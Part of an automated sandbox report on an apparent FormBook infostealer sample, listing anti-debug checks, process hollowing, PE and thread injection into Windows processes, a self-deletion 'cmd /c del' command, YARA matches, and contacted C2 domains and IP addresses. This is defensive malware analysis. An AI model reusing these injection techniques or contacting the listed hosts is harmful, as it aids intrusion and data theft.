Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04536DC9 mov eax, dword ptr fs:[00000030h] 20_2_04536DC9
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04568DF1 mov eax, dword ptr fs:[00000030h] 20_2_04568DF1
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044BB1E1 mov eax, dword ptr fs:[00000030h] 20_2_044BB1E1
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044BB1E1 mov eax, dword ptr fs:[00000030h] 20_2_044BB1E1
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044BB1E1 mov eax, dword ptr fs:[00000030h] 20_2_044BB1E1
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044CD5E0 mov eax, dword ptr fs:[00000030h] 20_2_044CD5E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044CD5E0 mov eax, dword ptr fs:[00000030h] 20_2_044CD5E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0457FDE2 mov eax, dword ptr fs:[00000030h] 20_2_0457FDE2
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0457FDE2 mov eax, dword ptr fs:[00000030h] 20_2_0457FDE2
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0457FDE2 mov eax, dword ptr fs:[00000030h] 20_2_0457FDE2
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0457FDE2 mov eax, dword ptr fs:[00000030h] 20_2_0457FDE2
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_045441E8 mov eax, dword ptr fs:[00000030h] 20_2_045441E8
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B2D8A mov eax, dword ptr fs:[00000030h] 20_2_044B2D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B2D8A mov eax, dword ptr fs:[00000030h] 20_2_044B2D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B2D8A mov eax, dword ptr fs:[00000030h] 20_2_044B2D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B2D8A mov eax, dword ptr fs:[00000030h] 20_2_044B2D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B2D8A mov eax, dword ptr fs:[00000030h] 20_2_044B2D8A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044EA185 mov eax, dword ptr fs:[00000030h] 20_2_044EA185
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044DC182 mov eax, dword ptr fs:[00000030h] 20_2_044DC182
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E2581 mov eax, dword ptr fs:[00000030h] 20_2_044E2581
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E2581 mov eax, dword ptr fs:[00000030h] 20_2_044E2581
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E2581 mov eax, dword ptr fs:[00000030h] 20_2_044E2581
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E2581 mov eax, dword ptr fs:[00000030h] 20_2_044E2581
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044EFD9B mov eax, dword ptr fs:[00000030h] 20_2_044EFD9B
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044EFD9B mov eax, dword ptr fs:[00000030h] 20_2_044EFD9B
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E2990 mov eax, dword ptr fs:[00000030h] 20_2_044E2990
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_045351BE mov eax, dword ptr fs:[00000030h] 20_2_045351BE
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_045351BE mov eax, dword ptr fs:[00000030h] 20_2_045351BE
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_045351BE mov eax, dword ptr fs:[00000030h] 20_2_045351BE
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_045351BE mov eax, dword ptr fs:[00000030h] 20_2_045351BE
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E61A0 mov eax, dword ptr fs:[00000030h] 20_2_044E61A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E61A0 mov eax, dword ptr fs:[00000030h] 20_2_044E61A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E35A1 mov eax, dword ptr fs:[00000030h] 20_2_044E35A1
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_045805AC mov eax, dword ptr fs:[00000030h] 20_2_045805AC
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_045805AC mov eax, dword ptr fs:[00000030h] 20_2_045805AC
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_045369A6 mov eax, dword ptr fs:[00000030h] 20_2_045369A6
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E1DB5 mov eax, dword ptr fs:[00000030h] 20_2_044E1DB5
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E1DB5 mov eax, dword ptr fs:[00000030h] 20_2_044E1DB5
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E1DB5 mov eax, dword ptr fs:[00000030h] 20_2_044E1DB5
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0457EA55 mov eax, dword ptr fs:[00000030h] 20_2_0457EA55
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04544257 mov eax, dword ptr fs:[00000030h] 20_2_04544257
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B9240 mov eax, dword ptr fs:[00000030h] 20_2_044B9240
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B9240 mov eax, dword ptr fs:[00000030h] 20_2_044B9240
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B9240 mov eax, dword ptr fs:[00000030h] 20_2_044B9240
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B9240 mov eax, dword ptr fs:[00000030h] 20_2_044B9240
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C7E41 mov eax, dword ptr fs:[00000030h] 20_2_044C7E41
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C7E41 mov eax, dword ptr fs:[00000030h] 20_2_044C7E41
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C7E41 mov eax, dword ptr fs:[00000030h] 20_2_044C7E41
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C7E41 mov eax, dword ptr fs:[00000030h] 20_2_044C7E41
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C7E41 mov eax, dword ptr fs:[00000030h] 20_2_044C7E41
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C7E41 mov eax, dword ptr fs:[00000030h] 20_2_044C7E41
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0457AE44 mov eax, dword ptr fs:[00000030h] 20_2_0457AE44
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0457AE44 mov eax, dword ptr fs:[00000030h] 20_2_0457AE44
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C766D mov eax, dword ptr fs:[00000030h] 20_2_044C766D
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F927A mov eax, dword ptr fs:[00000030h] 20_2_044F927A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0456B260 mov eax, dword ptr fs:[00000030h] 20_2_0456B260
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0456B260 mov eax, dword ptr fs:[00000030h] 20_2_0456B260
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04588A62 mov eax, dword ptr fs:[00000030h] 20_2_04588A62
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044DAE73 mov eax, dword ptr fs:[00000030h] 20_2_044DAE73
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044DAE73 mov eax, dword ptr fs:[00000030h] 20_2_044DAE73
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044DAE73 mov eax, dword ptr fs:[00000030h] 20_2_044DAE73
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044DAE73 mov eax, dword ptr fs:[00000030h] 20_2_044DAE73
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044DAE73 mov eax, dword ptr fs:[00000030h] 20_2_044DAE73
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C8A0A mov eax, dword ptr fs:[00000030h] 20_2_044C8A0A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044BC600 mov eax, dword ptr fs:[00000030h] 20_2_044BC600
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044BC600 mov eax, dword ptr fs:[00000030h] 20_2_044BC600
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044BC600 mov eax, dword ptr fs:[00000030h] 20_2_044BC600
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E8E00 mov eax, dword ptr fs:[00000030h] 20_2_044E8E00
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044D3A1C mov eax, dword ptr fs:[00000030h] 20_2_044D3A1C
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044EA61C mov eax, dword ptr fs:[00000030h] 20_2_044EA61C
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044EA61C mov eax, dword ptr fs:[00000030h] 20_2_044EA61C
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B5210 mov eax, dword ptr fs:[00000030h] 20_2_044B5210
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B5210 mov ecx, dword ptr fs:[00000030h] 20_2_044B5210
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B5210 mov eax, dword ptr fs:[00000030h] 20_2_044B5210
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B5210 mov eax, dword ptr fs:[00000030h] 20_2_044B5210
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044BAA16 mov eax, dword ptr fs:[00000030h] 20_2_044BAA16
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044BAA16 mov eax, dword ptr fs:[00000030h] 20_2_044BAA16
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04571608 mov eax, dword ptr fs:[00000030h] 20_2_04571608
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F4A2C mov eax, dword ptr fs:[00000030h] 20_2_044F4A2C
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F4A2C mov eax, dword ptr fs:[00000030h] 20_2_044F4A2C
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0456FE3F mov eax, dword ptr fs:[00000030h] 20_2_0456FE3F
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044BE620 mov eax, dword ptr fs:[00000030h] 20_2_044BE620
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E36CC mov eax, dword ptr fs:[00000030h] 20_2_044E36CC
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E2ACB mov eax, dword ptr fs:[00000030h] 20_2_044E2ACB
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F8EC7 mov eax, dword ptr fs:[00000030h] 20_2_044F8EC7
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04588ED6 mov eax, dword ptr fs:[00000030h] 20_2_04588ED6
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0456FEC0 mov eax, dword ptr fs:[00000030h] 20_2_0456FEC0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E2AE4 mov eax, dword ptr fs:[00000030h] 20_2_044E2AE4
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E16E0 mov ecx, dword ptr fs:[00000030h] 20_2_044E16E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C76E2 mov eax, dword ptr fs:[00000030h] 20_2_044C76E2
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0454FE87 mov eax, dword ptr fs:[00000030h] 20_2_0454FE87
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044ED294 mov eax, dword ptr fs:[00000030h] 20_2_044ED294
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044ED294 mov eax, dword ptr fs:[00000030h] 20_2_044ED294
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B52A5 mov eax, dword ptr fs:[00000030h] 20_2_044B52A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B52A5 mov eax, dword ptr fs:[00000030h] 20_2_044B52A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B52A5 mov eax, dword ptr fs:[00000030h] 20_2_044B52A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B52A5 mov eax, dword ptr fs:[00000030h] 20_2_044B52A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B52A5 mov eax, dword ptr fs:[00000030h] 20_2_044B52A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_045346A7 mov eax, dword ptr fs:[00000030h] 20_2_045346A7
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044CAAB0 mov eax, dword ptr fs:[00000030h] 20_2_044CAAB0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044CAAB0 mov eax, dword ptr fs:[00000030h] 20_2_044CAAB0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04580EA5 mov eax, dword ptr fs:[00000030h] 20_2_04580EA5
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04580EA5 mov eax, dword ptr fs:[00000030h] 20_2_04580EA5
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04580EA5 mov eax, dword ptr fs:[00000030h] 20_2_04580EA5
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044EFAB0 mov eax, dword ptr fs:[00000030h] 20_2_044EFAB0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04588B58 mov eax, dword ptr fs:[00000030h] 20_2_04588B58
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044BDB40 mov eax, dword ptr fs:[00000030h] 20_2_044BDB40
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044CEF40 mov eax, dword ptr fs:[00000030h] 20_2_044CEF40
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044BF358 mov eax, dword ptr fs:[00000030h] 20_2_044BF358
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044BDB60 mov ecx, dword ptr fs:[00000030h] 20_2_044BDB60
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044CFF60 mov eax, dword ptr fs:[00000030h] 20_2_044CFF60
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04588F6A mov eax, dword ptr fs:[00000030h] 20_2_04588F6A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E3B7A mov eax, dword ptr fs:[00000030h] 20_2_044E3B7A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E3B7A mov eax, dword ptr fs:[00000030h] 20_2_044E3B7A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044EA70E mov eax, dword ptr fs:[00000030h] 20_2_044EA70E
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044EA70E mov eax, dword ptr fs:[00000030h] 20_2_044EA70E
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0454FF10 mov eax, dword ptr fs:[00000030h] 20_2_0454FF10
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0454FF10 mov eax, dword ptr fs:[00000030h] 20_2_0454FF10
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0457131B mov eax, dword ptr fs:[00000030h] 20_2_0457131B
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\DpiScaling.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649540 NtReadFile,LdrInitializeThunk, 13_2_04649540

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 6ld01n28q8c.exe.14.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.alert78.info
Source: C:\Windows\explorer.exe Domain query: www.bestpleasure4u.com
Source: C:\Windows\explorer.exe Domain query: www.pkem.top
Source: C:\Windows\explorer.exe Domain query: www.awp.email
Source: C:\Windows\explorer.exe Domain query: www.librairie-adrienne.com
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.alifdanismanlik.com
Source: C:\Windows\explorer.exe Domain query: www.bendyourtongue.com
Source: C:\Windows\explorer.exe Network Connect: 162.0.232.169 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.90.64.134 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.handejqr.com
Source: C:\Windows\explorer.exe Domain query: www.protection-onepa.com
Source: C:\Windows\explorer.exe Domain query: www.fabio.tools
Source: C:\Windows\explorer.exe Network Connect: 34.90.73.145 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 157.90.247.57 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.rematedeldia.com
Source: C:\Windows\explorer.exe Domain query: www.cielotherepy.com
Source: C:\Windows\explorer.exe Domain query: www.byausorsm26-plala.xyz
Source: C:\Windows\explorer.exe Network Connect: 206.188.193.90 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.the-pumps.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.217 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.20dzwww.com
Source: C:\Windows\explorer.exe Domain query: www.game2plays.com
Source: C:\Windows\explorer.exe Domain query: www.kreativevisibility.net
Source: C:\Windows\explorer.exe Network Connect: 162.0.214.189 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.t1uba.com
Source: C:\Windows\explorer.exe Network Connect: 52.89.53.122 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.240 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.bubu3cin.com
Source: C:\Windows\explorer.exe Network Connect: 119.28.141.142 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.anniebapartments.com
Source: C:\Windows\explorer.exe Network Connect: 172.120.156.91 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.215 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\DpiScaling.exe Section unmapped: C:\Windows\SysWOW64\systray.exe base address: 20000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\DpiScaling.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 72480000 Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 480000 Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 490000 Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000 Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 760000 Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 770000 Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000 Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: AF0000 Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: B00000 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 72480000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 480000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 490000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 72480000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 760000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 770000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 72480000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: AF0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: B00000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 72480000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\DpiScaling.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\DpiScaling.exe Thread register set: target process: 3352 Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Thread register set: target process: 3352 Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 490000 Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 770000 Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: B00000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\DpiScaling.exe" Jump to behavior
Source: explorer.exe, 0000000E.00000000.366611598.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.347693062.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.468014235.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.388499876.0000000000B68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman\Pr
Source: explorer.exe, 0000000E.00000000.469737729.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.347973710.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.389203545.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.366957090.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000000E.00000000.404286705.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.469737729.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.347973710.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.389203545.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.371531129.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.350568015.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.366957090.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000E.00000000.469737729.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.347973710.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.389203545.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.366957090.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000E.00000000.469737729.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.347973710.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.389203545.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.366957090.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000E.00000000.375239954.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.410877237.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.357539802.0000000008778000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWndh
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
